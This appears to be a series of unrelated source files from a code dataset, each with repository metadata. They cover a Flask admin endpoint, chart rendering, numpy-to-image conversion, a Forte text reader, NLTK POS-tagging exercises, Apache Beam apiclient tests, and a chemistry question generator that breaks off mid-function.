@admin_api.route('/api/admin/<int:id>', methods=['DELETE'])
def delete_one_admin(id):
    """Delete one admin; 404 when missing, empty 204 on success."""
    doomed = Admin.query.filter_by(id=id).first_or_404()
    db.session.delete(doomed)
    db.session.commit()
    return '', 204
{
"api_name": "flask.Blueprint",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "flask.request.args",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "flask.request",... |
18458121758 | from __future__ import unicode_literals
import datetime
import cairo
import pycha.line
import StringIO
import time
import six
from uds.models import getSqlDatetime
import counters
# Chart types
CHART_TYPE_LINE, CHART_TYPE_AREA, CHART_TYPE_BAR = range(3) # @UndefinedVariable
__typeTitles = None
def make(obj, counterType, **kwargs):
    """Render a PNG line chart of a counter's history and return its bytes.

    Args:
        obj: the object whose counters are charted.
        counterType: which counter to plot (see the counters module).
        **kwargs: width/height in pixels, an explicit since/to window or an
            ``interval`` in days ending now, and ``use_max`` forwarded to
            the counters query.

    Returns:
        The PNG image as a byte string.
    """
    width, height = (kwargs.get('width', 800), kwargs.get('height', 600))

    # Resolve the time window: an explicit since/to pair wins; otherwise an
    # ``interval`` (days back from now) may define it.
    since = kwargs.get('since', None)
    to = kwargs.get('to', None)
    if since is None and to is None:
        interval = kwargs.get('interval', None)
        if interval is not None:
            to = getSqlDatetime()
            since = to - datetime.timedelta(days=interval)

    # One data point per horizontal pixel is enough.
    limit = width

    dataset1 = tuple((int(time.mktime(x[0].timetuple())), x[1]) for x in counters.getCounters(obj, counterType, since=since, to=to, limit=limit, use_max=kwargs.get('use_max', False)))

    if len(dataset1) == 0:
        # No data: chart a flat zero line over the last hour.
        dataset1 = ((getSqlDatetime(True) - 3600, 0), (getSqlDatetime(True), 0))

    firstLast = (dataset1[0][0], getSqlDatetime(True))

    # Pick an x-axis label format matching the span being shown.
    xLabelFormat = '%y-%m-%d'
    diffInterval = firstLast[1] - firstLast[0]
    if diffInterval <= 60 * 60 * 24:  # Less than one day
        xLabelFormat = '%H:%M'
    elif diffInterval <= 60 * 60 * 24 * 7:
        xLabelFormat = '%A'

    surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, width, height)

    dataset = ((counters.getCounterTitle(counterType).encode('iso-8859-1', errors='ignore'), dataset1),)
    options = {
        'axis': {
            'x': {
                'ticks': [dict(v=i, label=datetime.datetime.fromtimestamp(i).strftime(xLabelFormat)) for i in firstLast],
                'range': (firstLast[0], firstLast[1])
            },
            'y': {
                'tickCount': 4,
            }
        },
        'background': {
            'chartColor': '#ffeeff',
            'baseColor': '#ffffff',
            'lineColor': '#444444'
        },
        'colorScheme': {
            'name': 'gradient',
            'args': {
                'initialColor': 'red',
            },
        },
        # BUG FIX: 'legend' appeared twice in this dict literal; the first
        # occurrence was silently discarded.  A single entry remains.
        'legend': {
            'hide': True,
        },
        'padding': {
            'left': 0,
            'bottom': 0,
        },
        'title': 'Sample Chart'
    }
    chart = pycha.line.LineChart(surface, options)
    chart.addDataset(dataset)
    chart.render()

    output = StringIO.StringIO()
    surface.write_to_png(output)
    return output.getvalue()
| karthik-arjunan/testuds | server/src/uds/core/util/stats/charts.py | charts.py | py | 2,497 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "uds.models.getSqlDatetime",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "time.mktime",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "counters.get... |
75173901865 |
"""Read a numpy file and output an image."""
import os
import sys

import numpy as np
from PIL import Image
def main(filename):
    """Convert a .npy depth array to an 8-bit grayscale PNG next to it.

    Values above 255 are clipped (with a warning) before the uint8 cast,
    and the image is written as <filename-without-extension>.png.
    """
    depth_array = np.load(filename)
    print(depth_array.shape)
    if np.max(depth_array) > 255:
        print("Values over 255! There is going to be truncations")
        depth_array = np.clip(depth_array, 0, 255)
    byte_array = depth_array.astype(np.uint8)
    img = Image.fromarray(byte_array, 'L')
    # BUG FIX: the original used filename.rstrip('npy'), which strips the
    # CHARACTERS n/p/y from the end of the name rather than the extension
    # and mangles names that do not end in '.npy'.  Replace the extension
    # properly instead.
    outfilename = os.path.splitext(filename)[0] + '.png'
    img.save(outfilename)
    # img.show()


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("usage: python {} <filename>".format(sys.argv[0]))
        exit()
    main(sys.argv[1])
| squeakus/bitsandbytes | blenderscripts/npy2img.py | npy2img.py | py | 677 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "numpy.load",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.clip",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 17,
... |
36121229353 | import os
from typing import Any, Iterator, Dict, Set
from forte.data.data_pack import DataPack
from forte.data.data_utils_io import dataset_path_iterator
from forte.data.base_reader import PackReader
from ft.onto.base_ontology import Document
__all__ = [
"PlainTextReader",
]
class PlainTextReader(PackReader):
    r""":class:`PlainTextReader` is designed to read in plain text dataset."""

    def _collect(self, text_directory) -> Iterator[Any]:
        r"""Should be called with param ``text_directory`` which is a path to a
        folder containing txt files.

        Args:
            text_directory: text directory containing the files.

        Returns:
            Iterator over paths to .txt files
        """
        # Which extensions are picked up is driven by the reader config.
        return dataset_path_iterator(text_directory, self.configs.file_ext)

    def _cache_key_function(self, text_file: str) -> str:
        # Cache entries are keyed by the file's base name alone.
        return os.path.basename(text_file)

    # pylint: disable=unused-argument
    def text_replace_operation(self, text: str):
        # No replacement operations: the text is ingested verbatim.
        return []

    def _parse_pack(self, file_path: str) -> Iterator[DataPack]:
        # One DataPack per file; undecodable bytes are skipped rather than
        # aborting the read.
        pack = DataPack()
        with open(file_path, "r", encoding="utf8", errors="ignore") as file:
            text = file.read()
        pack.set_text(text, replace_func=self.text_replace_operation)
        # A single Document annotation spanning the whole text.
        Document(pack, 0, len(pack.text))
        pack.pack_name = file_path
        yield pack

    @classmethod
    def default_configs(cls):
        # ``file_ext`` controls which files _collect picks up.
        return {"file_ext": ".txt"}

    def record(self, record_meta: Dict[str, Set[str]]):
        r"""Method to add output type record of `PlainTextReader` which is
        `ft.onto.base_ontology.Document` with an empty set
        to :attr:`forte.data.data_pack.Meta.record`.

        Args:
            record_meta: the field in the datapack for type record that need to
                fill in for consistency checking.
        """
        record_meta["ft.onto.base_ontology.Document"] = set()
| asyml/forte | forte/data/readers/plaintext_reader.py | plaintext_reader.py | py | 1,931 | python | en | code | 230 | github-code | 36 | [
{
"api_name": "forte.data.base_reader.PackReader",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "forte.data.data_utils_io.dataset_path_iterator",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "typing.Iterator",
"line_number": 17,
"usage_type": "name... |
30112355766 | import os
import wikipedia
from nltk.tag.stanford import StanfordPOSTagger
from nltk.tokenize import sent_tokenize
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
from nltk.corpus import wordnet
import matplotlib.pyplot as plt
os.environ["JAVAHOME"] = "C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" # didn't have java in path on my local machine :)
model_path = "../stanford-postagger-full-2018-10-16/models/english-bidirectional-distsim.tagger"
jar_path = "../stanford-postagger-full-2018-10-16/stanford-postagger.jar"
tagger = StanfordPOSTagger(model_path, jar_path)
def ex1():
page = wikipedia.page("Shrek")
content = page.content
words_in_text = word_tokenize(content)
print("Title: " + page.title)
print("First 200 words: ", words_in_text[:200])
sentences = sent_tokenize(content)
# get first 20 sentences (or maximum if not having 20)
first_20_sentences = sentences[:min(20, len(sentences))]
# word tokenize the sentence and apply tagger
tagger_results = [tagger.tag(word_tokenize(el)) for el in first_20_sentences]
print(tagger_results)
return page
def list_of_words_for_tag(text, tag):
    """Return every word in ``text`` whose Stanford POS tag equals ``tag``."""
    tagged_words = []
    # Tag sentence by sentence, then flatten into one (word, tag) stream.
    for sentence in sent_tokenize(text):
        tagged_words.extend(tagger.tag(word_tokenize(sentence)))
    return [word for word, word_tag in tagged_words if word_tag == tag]
def ex2(text, tags):
    """Collect the words of ``text`` matching any POS tag in ``tags``."""
    words = []
    for tag in tags:
        words.extend(list_of_words_for_tag(text, tag))
    return words
def ex3(text):
nouns_tags = ["NN", "NNS", "NNP", "NNPS"]
verbs_tags = ["VB", "VBD", "VBG", "VBN", "VBP", "VBZ"]
number_of_words_in_text = get_number_of_words_in_text(text)
nouns = ex2(text, nouns_tags)
verbs = ex2(text, verbs_tags)
print("Nouns: ", nouns)
print("Verbs: ", verbs)
print("Percentage of content words: ", (len(nouns) + len(verbs)) / number_of_words_in_text * 100, "%")
def get_number_of_words_in_text(text):
return len(word_tokenize(text))
def ex4(text, n=5):
print("Original word | POS | Simple lemmatization | Lemmatization with POS")
lemma = WordNetLemmatizer()
sentences = sent_tokenize(text)
sentences = sentences[:min(n, len(sentences))]
tagger_results = [tagger.tag(word_tokenize(el)) for el in sentences]
tagger_results = [el for sublist in tagger_results for el in sublist]
already_counted = []
for word, tag in tagger_results:
word_net_pos = get_wordnet_pos(tag)
# Do nothing if not a knows (or lemmatizable word)
if word_net_pos == '':
continue
lemmatization = lemma.lemmatize(word)
lemmatization_with_pos = lemma.lemmatize(word, word_net_pos)
if lemmatization != lemmatization_with_pos and (word, tag) not in already_counted:
print_table_row(word, tag, lemmatization, lemmatization_with_pos)
already_counted.append((word, tag))
def print_table_row(original_word, pos, lemmatization, lemmatization_with_pos):
    """Print one ' | '-separated row of the lemmatization table."""
    cells = [original_word, pos, lemmatization, lemmatization_with_pos]
    print(" | ".join(cells))
def get_wordnet_pos(tag):
    """Map a Penn Treebank tag to its WordNet POS constant ('' if none)."""
    # Treebank tags encode the coarse POS in their first letter.
    if tag.startswith('J'):
        return wordnet.ADJ
    if tag.startswith('V'):
        return wordnet.VERB
    if tag.startswith('N'):
        return wordnet.NOUN
    if tag.startswith('R'):
        return wordnet.ADV
    return ''
def ex5(text, maximum=5):
sentences = sent_tokenize(text)
tagger_results = [tagger.tag(word_tokenize(el)) for el in sentences]
tagger_results = [el for sublist in tagger_results for el in sublist]
pos_numbers = dict()
for _, tag in tagger_results:
if tag not in pos_numbers:
pos_numbers[tag] = 1
else:
pos_numbers[tag] += 1
# pos_numbers = pos_numbers[:min(maximum, len(pos_numbers))]
pos_numbers = [(key, value) for key, value in pos_numbers.items()]
pos_numbers.sort(key=lambda el: el[1], reverse=True)
pos_numbers = pos_numbers[:min(maximum, len(pos_numbers))]
keys = [key for key, _ in pos_numbers]
values = [value for _, value in pos_numbers]
plt.bar(keys, values)
plt.show()
# Voi folosi un text mai scurt pentru teste. Pentru cum este conceputa cerinta, din pacate, se fac multe
# calcule oarecum, degeaba, asa ca voi folosi un text mai scurt pentru a nu astepta foarte mult.
# Daca se vrea rularea pe textul din wikipedia se va rula pe urmatorul text: page.content
TEST_TEXT = "This is my test text. With this test text I will test everything. This is great, amazing text." \
" I will make this text great again! Why are you running?"
if __name__ == "__main__":
print("Ex1")
page = ex1()
print("Ex3")
# ex3(page.content)
ex3(TEST_TEXT)
print("Ex4")
ex4(TEST_TEXT)
print("Ex4")
ex5(TEST_TEXT)
| daneel95/Master_Homework | Restanta/NLP/Lab3/homework1.py | homework1.py | py | 4,985 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "nltk.tag.stanford.StanfordPOSTagger",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "wikipedia.page",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "nl... |
21619670691 | import unittest
from mock import Mock
from apache_beam.metrics.cells import DistributionData
from apache_beam.runners.google_cloud_dataflow.dataflow_runner import DataflowRunner
from apache_beam.runners.google_cloud_dataflow.internal import apiclient
from apache_beam.runners.google_cloud_dataflow.internal.clients import dataflow
from apache_beam.utils.pipeline_options import PipelineOptions
class UtilTest(unittest.TestCase):
    """Unit tests for the Dataflow apiclient helpers."""

    @unittest.skip("Enable once BEAM-1080 is fixed.")
    def test_create_application_client(self):
        # Smoke test: constructing the client should not raise.
        pipeline_options = PipelineOptions()
        apiclient.DataflowApplicationClient(
            pipeline_options,
            DataflowRunner.BATCH_ENVIRONMENT_MAJOR_VERSION)

    def test_default_job_name(self):
        # Auto-generated job names follow beamapp-...-<10-digit>-<6-digit>.
        job_name = apiclient.Job.default_job_name(None)
        regexp = 'beamapp-.*-[0-9]{10}-[0-9]{6}'
        self.assertRegexpMatches(job_name, regexp)

    def test_split_int(self):
        # Values below 2**32 land entirely in lowBits ...
        number = 12345
        split_number = apiclient.to_split_int(number)
        self.assertEqual((split_number.lowBits, split_number.highBits),
                         (number, 0))
        # ... and a value shifted left by 32 bits lands in highBits.
        shift_number = number << 32
        split_number = apiclient.to_split_int(shift_number)
        self.assertEqual((split_number.lowBits, split_number.highBits),
                         (0, number))

    def test_translate_distribution(self):
        # DistributionData fields must map one-to-one onto the
        # CounterUpdate's distribution message.
        metric_update = dataflow.CounterUpdate()
        distribution_update = DistributionData(16, 2, 1, 15)
        apiclient.translate_distribution(distribution_update, metric_update)
        self.assertEqual(metric_update.distribution.min.lowBits,
                         distribution_update.min)
        self.assertEqual(metric_update.distribution.max.lowBits,
                         distribution_update.max)
        self.assertEqual(metric_update.distribution.sum.lowBits,
                         distribution_update.sum)
        self.assertEqual(metric_update.distribution.count.lowBits,
                         distribution_update.count)

    def test_translate_means(self):
        # Integer means keep sum/count as split ints ...
        metric_update = dataflow.CounterUpdate()
        accumulator = Mock()
        accumulator.sum = 16
        accumulator.count = 2
        apiclient.MetricUpdateTranslators.translate_scalar_mean_int(accumulator,
                                                                    metric_update)
        self.assertEqual(metric_update.integerMean.sum.lowBits, accumulator.sum)
        self.assertEqual(metric_update.integerMean.count.lowBits, accumulator.count)

        # ... while floating-point means store the sum directly.
        accumulator.sum = 16.0
        accumulator.count = 2
        apiclient.MetricUpdateTranslators.translate_scalar_mean_float(accumulator,
                                                                      metric_update)
        self.assertEqual(metric_update.floatingPointMean.sum, accumulator.sum)
        self.assertEqual(
            metric_update.floatingPointMean.count.lowBits, accumulator.count)
if __name__ == '__main__':
unittest.main()
| a0x8o/kafka | sdks/python/apache_beam/runners/google_cloud_dataflow/internal/apiclient_test.py | apiclient_test.py | py | 2,815 | python | en | code | 59 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "apache_beam.utils.pipeline_options.PipelineOptions",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "apache_beam.runners.google_cloud_dataflow.internal.apiclient.DataflowAp... |
14838409343 | import json
import random
import re
import pubchempy as pcp
from csv_to_json import formulate_code
# -------- \begin constants ----------------------
atoms_list = [" Hydrogen ",
" Helium ",
" Lithium ",
" Beryllium ",
" Boron ",
" Carbon ",
" Nitrogen ",
" Oxygen ",
" Fluorine ",
" Neon ",
" Sodium ",
" Magnesium ",
" Aluminium ",
" Silicon ",
" Phosphorus ",
" Sulfur ",
" Chlorine ",
" Argon ",
" Potassium ",
" Calcium ",
" Scandium ",
" Titanium ",
" Vanadium ",
" Chromium ",
" Manganese ",
" Iron ",
" Cobalt ",
" Nickel ",
" Copper ",
" Zinc ",
" Gallium ",
" Germanium ",
" Arsenic ",
" Selenium ",
" Bromine ",
" Krypton ",
" Rubidium ",
" Strontium ",
" Yttrium ",
" Zirconium ",
" Niobium ",
" Molybdenum ",
" Technetium ",
" Ruthenium ",
" Rhodium ",
" Palladium ",
" Silver ",
" Cadmium ",
" Indium ",
" Tin ",
" Antimony ",
" Tellurium ",
" Iodine ",
" Xenon ",
" Cesium ",
" Barium ",
" Lanthanum ",
" Cerium ",
" Praseodymium ",
" Neodymium ",
" Promethium ",
" Samarium ",
" Europium ",
" Gadolinium ",
" Terbium ",
" Dysprosium ",
" Holmium ",
" Erbium ",
" Thulium ",
" Ytterbium ",
" Lutetium ",
" Hafnium ",
" Tantalum ",
" Tungsten ",
" Rhenium ",
" Osmium ",
" Iridium ",
" Platinum ",
" Gold ",
" Mercury ",
" Thallium ",
" Lead ",
" Bismuth ",
" Polonium ",
" Astatine ",
" Radon ",
" Francium ",
" Radium ",
" Actinium ",
" Thorium ",
" Protactinium ",
" Uranium ",
" Neptunium ",
" Plutonium ",
" Americium ",
" Curium ",
" Berkelium ",
" Californium ",
" Einsteinium ",
" Fermium ",
" Mendelevium ",
" Nobelium ",
" Lawrencium ",
" Rutherfordium ",
" Dubnium ",
" Seaborgium ",
" Bohrium ",
" Hassium ",
" Meitnerium ",
" Darmstadtium ",
" Roentgenium ",
" Copernicium ",
" Nihonium ",
" Flerovium ",
" Moscovium ",
" Livermorium ",
" Tennessine ",
" Oganesson ",
]
not_a_compound_list = ["the", "was", "and", "get", "of", "in", "as", "an"]
# -------- \end constants ----------------------
# -------- \begin question types ----------------------
def if_the_temprature_passes(row):
    """Parse the 'If the temperature passes ...' context pattern.

    Returns (temperature threshold, loss, heating duration, compound name)
    as re.findall result lists, or four Nones when the pattern is absent.
    """
    if re.search("If the temperature passes", row["contexts"]) is None:
        return None, None, None, None
    clause = re.search(
        r"If the temperature passes \d+ degrees when heating .* for more than \d+ seconds .*",
        row["contexts"]).group()
    temp_threshold_str = re.findall(r"\d+ degrees", clause)
    heat_duration_str = re.findall(r"\d+ seconds", clause)
    loss_str = re.findall(r"loss of (\D*\d+\.?\d* [grams|milligrams|\%]+)", clause)
    name = re.findall(" when heating (.*) for more", clause)
    return temp_threshold_str, loss_str, heat_duration_str, name
def We_discovered_that_if_the_amount_of(row):
    """Parse the 'We discovered that if the amount of ...' context pattern.

    Returns (temperature threshold, loss, quantity threshold, compound
    name) as re.findall result lists, or four Nones when the pattern is
    absent.
    """
    if re.search("We discovered that if the amount of", row["contexts"]) is None:
        # BUG FIX: the match branch returns four values but the original
        # miss branch returned only two, so callers unpacking the result
        # crashed with "not enough values to unpack".
        return None, None, None, None
    clause = re.search(
        "We discovered that if the amount of .*", row["contexts"]).group()
    quantity_threshold = re.findall(r"above (\D*\d+\.?\d* [grams|milligrams|\%]+)", clause)
    threshold_comp_name = re.findall("the amount of (.*) in", clause)
    temp_threshold_str = re.findall(r"the temperature is less than (\D*\d+\.?\d* degrees)", clause)
    loss_str = re.findall(r"the product of the process decreases by (\d+\%)", clause)
    return temp_threshold_str, loss_str, quantity_threshold, threshold_comp_name
def overheat_the(row):
    """Parse the 'Overheat the ...' context pattern.

    Returns (temperature threshold, loss, decrease ratio, product name) as
    re.findall result lists, or four Nones when the pattern is absent.
    """
    if re.search("Overheat the .*", row["contexts"]) is None:
        # BUG FIX: the match branch returns four values but the original
        # miss branch returned only three, so callers unpacking the result
        # crashed with "not enough values to unpack".
        return None, None, None, None
    clause = re.search("Overheat the .*", row["contexts"]).group()
    temp_threshold_str = re.findall(r"the temperature is above (\D*\d+\.?\d* degrees)", clause)
    decrease_ratio_str = re.findall(r"for each (\d+\.\d+ [second|hour]+)", clause)
    loss_str = re.findall(r"a loss of (\D*\d+\.?\d* [grams|milligrams|ml|ML\%]+)", clause)
    product_name = re.findall("Overheat the (.*) will result", clause)
    return temp_threshold_str, loss_str, decrease_ratio_str, product_name
def if_we_heat(row):
    """Extract (temperature threshold, loss rate, component name) from an
    "If we heat ..." context.

    Fix: the no-match branch now returns a 3-tuple of Nones to match the
    three values of the success branch (previously two Nones).
    """
    if re.search("If we heat .*", row["contexts"]) is None:
        return None, None, None
    additional_info = re.search(
        "If we heat .*", row["contexts"])
    temp_threshold_str = re.findall("to temperature higher than (\D*\d+\.?\d* degrees)", additional_info.group())
    loss_str = re.findall("at a rate of (\D*\d+\.?\d* [grams|milligrams|milliliters|\%]+) per minute.",
                          additional_info.group())
    name = re.findall("If we heat (.*) to tem", additional_info.group())
    return temp_threshold_str, loss_str, name
def stirring_the_mixture_longer(row):
    """Extract (loss amount, per-unit-time ratio, name) from a "stirring the
    mixture longer ..." context.

    Fix: the no-match branch now returns a 3-tuple of Nones to match the
    three values of the success branch (previously two Nones).
    """
    if re.search("stirring the mixture longer.*", row["contexts"]) is None:
        return None, None, None
    additional_info = re.search(
        "stirring the mixture longer.*", row["contexts"])
    loss_str = re.findall("will cause a loss of (\D*\d+\.?\d* [grams|milligrams|milliliters|\%]+)",
                          additional_info.group())
    decrease_ratio_str = re.findall("for each (minute|hour) above the original time",
                                    additional_info.group())
    # This template always refers to "the mixture" itself.
    name = ["the mixture"]
    return loss_str, decrease_ratio_str, name
def if_the_temperature_exceed(row):
    """Extract (temperature threshold, decrease ratio, name) from an
    " If the temperature exceed ..." context (note the leading space in the
    trigger phrase).

    Fix: the no-match branch now returns a 3-tuple of Nones to match the
    three values of the success branch (previously two Nones).
    """
    if re.search(" If the temperature exceed .*", row["contexts"]) is None:
        return None, None, None
    additional_info = re.search(
        "If the temperature exceed .*", row["contexts"])
    temp_threshold_str = re.findall("If the temperature exceed (\D*\d+\.?\d* degrees)",
                                    additional_info.group())
    decrease_ratio_str = re.findall("it will result in (\d+\% decrease) in the final products",
                                    additional_info.group())
    name = re.findall("when heating (.*) it will result", additional_info.group())
    return temp_threshold_str, decrease_ratio_str, name
def if_we_cool_the_mixture(row):
    """Extract (temperature threshold, decrease ratio, name) from an
    "If we cool the mixture ..." context.

    Fix: the no-match branch now returns a 3-tuple of Nones to match the
    three values of the success branch (previously two Nones).
    """
    if re.search("If we cool the mixture.*", row["contexts"]) is None:
        return None, None, None
    additional_info = re.search(
        "If we cool the mixture.*", row["contexts"])
    temp_threshold_str = re.findall("below (\D*\d+\.?\d* degrees)",
                                    additional_info.group())
    decrease_ratio_str = re.findall("the product of the process decreases by (\d+\%)",
                                    additional_info.group())
    # This template always refers to "the mixture" itself.
    name = ["the mixture"]
    return temp_threshold_str, decrease_ratio_str, name
# -------- \end question types ----------------------
# --------- \begin function for generating the question -------
def randomize_product_amount(vars_and_vals):
    """Return a randomly perturbed copy of the product amount string
    ``vars_and_vals[1]`` ("<value> <unit>").

    The value is scaled by a uniform factor in [0, 2); a weight unit is
    replaced by a random weight unit and a volume unit by a random volume
    unit. Units outside both sets are kept unchanged.

    Fix: the original replaced *volume* units with a random choice from the
    weight-unit list (copy-paste error); a volume unit now stays a volume
    unit.
    """
    weight_units = ['gr', 'mg', 'kg']
    volume_units = ['mL', 'L']
    parts = vars_and_vals[1].split()
    value = float(parts[0]) * random.uniform(0, 2)
    unit = parts[1]
    if unit in weight_units:
        unit = random.choice(weight_units)
    elif unit in volume_units:
        unit = random.choice(volume_units)
    return "{:.2f}".format(value) + " " + unit
def generate_reactors(components):
    """Build a "have" description for the given [name, amount] components.

    Returns (text, reactors_list) where text is "AMOUNT of NAME, ..." and
    reactors_list mirrors the components. With 20% probability per component
    the amount and unit are randomised.

    Fix: volume units were previously replaced by a random *weight* unit
    (copy-paste error); a volume unit now stays a volume unit.

    NOTE(review): the randomised branch appends [amount, unit] while the
    plain branch appends [amount, name] — asymmetric, but preserved because
    generate_question_type2 depends on the existing shape; confirm intent.
    """
    available_reactors = ""
    reactors_list = []
    for comp in components:
        # Strip a leading parenthesis left over from upstream parsing.
        if comp[0].startswith("("):
            comp[0] = comp[0][1:]
        if random.random() < 0.2:  # w.p. 20% change the amount and units
            weight_units = ['gr', 'mg', 'kg']
            volume_units = ['mL', 'L']
            amount_unit_split = comp[1].split()
            if amount_unit_split[1] == 'g':
                amount_unit_split[1] = 'gr'
            if amount_unit_split[1] in weight_units:
                amount_unit_split[1] = random.choice(weight_units)
            elif amount_unit_split[1] in volume_units:
                amount_unit_split[1] = random.choice(volume_units)
            amount_unit_split[0] = str(float(amount_unit_split[0]) * (random.uniform(0, 2)))
            available_reactors += amount_unit_split[0] + " " + amount_unit_split[1] + " of " + comp[0] + ", "
            reactors_list.append([amount_unit_split[0], amount_unit_split[1]])
        else:
            available_reactors += comp[1] + " of " + comp[0] + ", "
            reactors_list.append([comp[1], comp[0]])
    return available_reactors, reactors_list
def get_vars_from_question(q_vars):
    """Convert an "AMOUNT of NAME, AMOUNT of NAME, " listing into a code
    literal of the form "[( ' NAME ' , ' AMOUNT ' ) ,...]".

    The trailing empty entry produced by the final ", " is dropped; any
    single quotes inside names or amounts are stripped.
    """
    code_vars = "["
    entries = q_vars.split(", ")[:-1]
    for entry in entries:
        parts = entry.split(" of ")
        name = parts[1].replace("'", "")
        amount = parts[0].replace("'", "")
        code_vars += f"( ' {name} ' , ' {amount} ' ) ,"
    return code_vars + "]"
def get_reactors_and_output(row):
    """Parse a reaction context into ([[name, amount], ...], product_amount).

    The last entry of the returned list describes the product itself;
    (None, None) is returned when no weight/volume can be located while
    scanning backwards through the final sentences.

    Fixes: the filter used ``i is not ''`` (identity comparison with a str
    literal — implementation-defined and a SyntaxWarning on CPython 3.8+),
    and items were removed from a list while it was being iterated, which
    skipped the element following each removal. The bare ``except`` around
    the backwards scan is narrowed to the two exceptions it actually
    handles.
    """
    context = row["contexts"]
    # Normalise "(N mmol, N <unit>)" annotations to "( <weight>, <mmol> )".
    check2switch = "\(\d+\.?\d* mmol, \d+\.?\d* mg\)|\(\d+\.?\d* mmol, \d+\.?\d* g\)\(\d+\.?\d* mmol, \d+\.?\d* mL\)\(\d+\.?\d* mmol, \d+\.?\d* gr\)\(\d+\.?\d* mmol, \d+\.?\d* ml\)"
    while re.search(check2switch, context) is not None:
        cc = re.search(check2switch, context)
        split_to_reorder = re.split("\(|,|\)", cc.group())
        context = context.replace(cc.group(), "( " + split_to_reorder[2] + ", " + split_to_reorder[1] + " )")
    split_by_sentence = context.split(". ")
    # Drop the last non-empty sentence (the "additional info") from the text
    # that will be scanned for reactors.
    if len(split_by_sentence[-1]) == 0:
        dropped_additional = context.replace(split_by_sentence[-2], '')
        start_search = -3
    else:
        dropped_additional = context.replace(split_by_sentence[-1], '')
        start_search = -2
    # Walk backwards through the sentences until one mentions an amount.
    succeed = False
    while not succeed:
        try:
            product_amount = re.search("(\d+\.?\d* g)|(\d+\.?\d* mg)|(\d+\.?\d* mL)|(\d+\.?\d* ml)",
                                       split_by_sentence[start_search]).group()
        except (AttributeError, IndexError):  # no match / ran out of sentences
            if start_search < -20:
                return None, None
            start_search -= 1
            continue
        succeed = True
    vars_and_vals_list = re.split("(\d+\.?\d* g)|(\d+\.?\d* mg)|(\d+\.?\d* mL)|(\d+\.?\d* ml)", dropped_additional)
    # re.split with groups yields None for non-matching alternatives and may
    # yield empty strings between adjacent matches; drop both.
    vars_and_vals_list = [i for i in vars_and_vals_list if i is not None and i != '']
    # Iterate over a snapshot: removing from the list being iterated would
    # skip the element that follows each removal.
    for item in list(vars_and_vals_list):
        if re.search("[a-z]+", item) is None:
            vars_and_vals_list.remove(item)
    vars_and_vals = []
    for i in range(len(vars_and_vals_list) // 2):
        if re.search("(\d+\.?\d* g)|(\d+\.?\d* mg)|(\d+\.?\d* mL)|(\d+\.?\d* ml)",
                     vars_and_vals_list[2 * i]) is not None:
            # Amount came first: take the component name from the next chunk.
            prev_sentence = vars_and_vals_list[2 * i + 1].split()
            vars_and_vals.append(
                [prev_sentence[0] if len(prev_sentence) == 1 else (
                    prev_sentence[1][1:] if prev_sentence[1].startswith("(") else prev_sentence[1]),
                 vars_and_vals_list[2 * i]])
        else:
            # Name came first: scan backwards for the token preceding the amount.
            idx = -1
            comp_name = ""
            prev_parts = vars_and_vals_list[2 * i].split()
            while re.search("[a-z|0-9]+", comp_name) is None:
                comp_name += prev_parts[idx]
                idx -= 1
            vars_and_vals.append(
                [comp_name[1:] if comp_name.startswith("(") else comp_name, vars_and_vals_list[2 * i + 1]])
    return vars_and_vals, product_amount
def get_time_from_question(question):
    """Return the duration phrase captured between ", for " and the final
    comma of a generated question (e.g. "3 hours")."""
    matches = re.findall(", for (.*),", question)
    return matches[0]
def generate_duration(row, desired_output):
    """Pick the question template matching the context's condition sentence
    and generate randomised temperature/duration values for it.

    Returns (generated_temp, temp_threshold_str, loss_str, duration string,
    heat_duration_str, name, question).

    NOTE(review): ``heat_duration_str`` is only set by the first template, so
    callers that gate on it (generate_question_type4) reject every other
    template. If *no* template matches, ``question`` is unbound and ``unit``
    is None, so the final return raises — presumably contexts always contain
    one of the phrases; confirm. In the last three templates ``name`` is a
    list interpolated directly into the f-string (renders as "['...']").
    """
    # function_lists = [if_the_temprature_passes, We_discovered_that_if_the_amount_of, overheat_the, if_we_heat,
    #                   stirring_the_mixture_longer, if_the_temperature_exceed, if_we_cool_the_mixture]
    generated_temp, temp_threshold_str, loss_str, generated_duration, heat_duration_str, name = None, None, None, None, None, None
    unit = None
    if None not in if_the_temprature_passes(row):
        temp_threshold_str, loss_str, heat_duration_str, name = if_the_temprature_passes(row)
        generated_temp = float(temp_threshold_str[0].split()[0]) + random.randint(-100, 100)
        generated_duration = float(re.findall("(\d+)", heat_duration_str[0])[0]) + random.randint(0, 10)
        unit = random.choice(["minutes", "hours"])
        question = f"if we heat to {generated_temp} degrees, for {generated_duration} {unit}, how much of the initial reactors to get {desired_output} of the final product?"
    if None not in We_discovered_that_if_the_amount_of(row):
        temp_threshold_str, loss_str, quantity_threshold, threshold_comp_name = We_discovered_that_if_the_amount_of(row)
        generated_temp = float(temp_threshold_str[0].split()[0]) + random.randint(-100, 100)
        generated_duration = random.randint(0, 10)
        # Quantity above the threshold so the condition in the story fires.
        generate_quantity = float(quantity_threshold[0].split()[0]) + random.uniform(
            float(quantity_threshold[0].split()[0]), 10)
        unit = random.choice(["minutes", "hours"])
